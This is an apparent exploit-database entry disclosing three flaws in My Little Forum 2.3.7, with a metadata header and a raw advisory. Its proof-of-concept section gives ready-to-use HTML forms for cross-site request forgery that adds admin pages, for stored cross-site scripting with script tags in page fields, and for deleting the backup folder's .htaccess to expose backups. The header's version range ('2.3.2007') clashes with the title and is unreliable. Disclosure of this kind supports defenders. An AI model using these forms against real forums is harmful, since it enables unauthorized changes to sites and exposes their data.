My Little Forum 2.3.7 - Multiple Vulnerability

vendor:

My Little Forum

by:

7.5

CVSS

HIGH

Cross-Site Request Forgery, Stored Cross-Site Scripting, CSRF Allow To Backup Disclosure

CWE

Product Name: My Little Forum

Affected Version From: 2.3.2007

Affected Version To: 2.3.2007

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

My Little Forum 2.3.7 – Multiple Vulnerability

This WebApplication is vulnerable and suffer from some vulnerability. The first exploit is a CSRF (Cross-Site Request Forgery) where an attacker can add a page to the web app. The second exploit is a Stored XSS (Cross-Site Scripting) where an attacker can inject malicious scripts into the page. The third exploit is a Backup Disclosure vulnerability where an attacker can delete the htaccess file in the backup folder.

Mitigation:

Source

Exploit-DB raw data:

Title:
======
My Little Forum  2.3.7 - Multiple Vulnerability


Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that 
displays the messages in classical threaded view (tree structure). It is 
Open Source licensed under the GNU General Public License. The main 
claim of this web forum is simplicity. Furthermore it should be easy to 
install and run on a standard server configuration with PHP and MySQL.


Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip


Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allow To Backup Disclosure


Vulnerability Details:
==============================
This WebApplication is vulnerable and suffer from some vulnerablity.


Severity Level:
===============
High


Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit can add page in webapp.
<form 
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Title">
<input type="hidden" name="content" value="Content">
<input type="hidden" name="menu_linkname" value="Name">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>


2. Stored XSS:
<form 
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Stored XSS 
<script>alert(1)</script>">
<input type="hidden" name="content" value="Stored XSS 
<script>alert(2)</script>">
<input type="hidden" name="menu_linkname" value="Stored XSS 
<script>alert(3)</script>">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>

3. Backup Disclosure:
with this exploit we can delect htaccess in backup folder for access to 
backups.
<form action="http://localhost/mylittleforum-master/index.php" 
method="post" accept-charset="utf-8">
<div>
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="delete_backup_files[]" value=".htaccess">
<input type="submit" name="delete_backup_files_confirm" value="OK - 
Delete">
</div>
</form>
Next use exploit go to:
http://localhost/mylittleforum-master/backup/



Author:
==================
Ashiyane Digital Security Team